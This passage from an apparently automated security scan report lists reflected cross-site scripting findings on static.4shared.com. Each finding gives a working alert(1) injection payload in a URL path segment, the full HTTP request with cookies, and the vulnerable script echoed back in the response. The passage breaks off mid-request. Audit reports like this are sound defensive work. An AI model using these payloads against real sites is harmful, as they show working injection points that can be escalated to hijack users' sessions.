1.158. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9a60'-alert(1)-'58541637cb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagese9a60'-alert(1)-'58541637cb9/icons/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagese9a60'-alert(1)-'58541637cb9/icons/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C46C7C159329C5F19881FB23DAEF6102.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:12 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/imagese9a60'-alert(1)-'58541637cb9/icons/misc/upload.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.159. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12c3"-alert(1)-"47c5b2bb8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E8D748AE8041A79D72ED23919C2AEE58.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/imagesd12c3"-alert(1)-"47c5b2bb8a7/icons/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.160. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e2cc"-alert(1)-"2ebb09db008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CE99907F2C97B1C657CAD61A79B27113.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:17 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9e2cc"-alert(1)-"2ebb09db008/misc/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.161. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96923'-alert(1)-'f0e8d4a42da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons96923'-alert(1)-'f0e8d4a42da/misc/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons96923'-alert(1)-'f0e8d4a42da/misc/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3F0F687D5F73214307EF702496F59680.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:18 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons96923'-alert(1)-'f0e8d4a42da/misc/upload.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}
...[SNIP]...

1.162. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87a8"-alert(1)-"2d8bde7f418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=64D6C4F34E3F9C45C1E0317EB44FE0FF.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misce87a8"-alert(1)-"2d8bde7f418/upload.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.163. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22059'-alert(1)-'d455916e230 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/misc22059'-alert(1)-'d455916e230/upload.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misc22059'-alert(1)-'d455916e230/upload.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=49C7CD6A43C3FB151C324575BE052231.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:24 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
Box == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons/misc22059'-alert(1)-'d455916e230/upload.gif',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.164. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a755"-alert(1)-"4ac0d6a008 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E5DB1FF8F3B4EA16522E1274F52FB585.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:28 GMT
Content-Length: 36238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/misc/upload.gif2a755"-alert(1)-"4ac0d6a008";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.165. http://static.4shared.com/images/icons/misc/upload.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/icons/misc/upload.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0d40'-alert(1)-'0916880c6ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icons/misc/upload.gifd0d40'-alert(1)-'0916880c6ad HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/misc/upload.gifd0d40'-alert(1)-'0916880c6ad
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CD7FCBFEBA1414F62C0F276B04D40908.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:29 GMT
Content-Length: 36254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
efined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/icons/misc/upload.gifd0d40'-alert(1)-'0916880c6ad',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.166. http://static.4shared.com/images/ipic.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/ipic.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f14c"-alert(1)-"566c054463f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images3f14c"-alert(1)-"566c054463f/ipic.jpg HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images3f14c"-alert(1)-"566c054463f/ipic.jpg
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BEA4F5F1AC669555A6514786824F1450.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:49 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images3f14c"-alert(1)-"566c054463f/ipic.jpg";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.167. http://static.4shared.com/images/ipic.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/ipic.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc8a1'-alert(1)-'53f956b8c46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagesfc8a1'-alert(1)-'53f956b8c46/ipic.jpg HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /imagesfc8a1'-alert(1)-'53f956b8c46/ipic.jpg
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD5406300DAEF5406945B731F0CB47E3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:51 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/imagesfc8a1'-alert(1)-'53f956b8c46/ipic.jpg',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

1.168. http://static.4shared.com/images/ipic.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/ipic.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b4f"-alert(1)-"94dac4f1560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ipic.jpg20b4f"-alert(1)-"94dac4f1560 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/ipic.jpg20b4f"-alert(1)-"94dac4f1560
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5BAF51C7A76C26D994BA2C87560631AE.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:55 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/ipic.jpg20b4f"-alert(1)-"94dac4f1560";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.169. http://static.4shared.com/images/ipic.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/images/ipic.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3af4'-alert(1)-'f7ac433e0bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ipic.jpge3af4'-alert(1)-'f7ac433e0bb HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/ipic.jpge3af4'-alert(1)-'f7ac433e0bb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F5843779A18C04171894979E8C5DDE6F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:56 GMT
Content-Length: 36189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>


...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/images/ipic.jpge3af4'-alert(1)-'f7ac433e0bb',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.170. http://static.4shared.com/js/dw_drag.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_drag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b97'-alert(1)-'cabf317dfd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js60b97'-alert(1)-'cabf317dfd3/dw_drag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js60b97'-alert(1)-'cabf317dfd3/dw_drag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5E6E409F4F8C6E7D94D1982EFF011264.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:24 GMT
Content-Length: 36149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js60b97'-alert(1)-'cabf317dfd3/dw_drag.js',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

f
...[SNIP]...

1.171. http://static.4shared.com/js/dw_drag.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_drag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79778"-alert(1)-"1c264739c21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js79778"-alert(1)-"1c264739c21/dw_drag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js79778"-alert(1)-"1c264739c21/dw_drag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA91D5B32A64AEF6FE6CA52D10425C19.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:23 GMT
Content-Length: 36149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js79778"-alert(1)-"1c264739c21/dw_drag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.172. http://static.4shared.com/js/dw_drag.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/dw_drag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bcb2'-alert(1)-'260d41ae0b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/dw_drag.js5bcb2'-alert(1)-'260d41ae0b6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
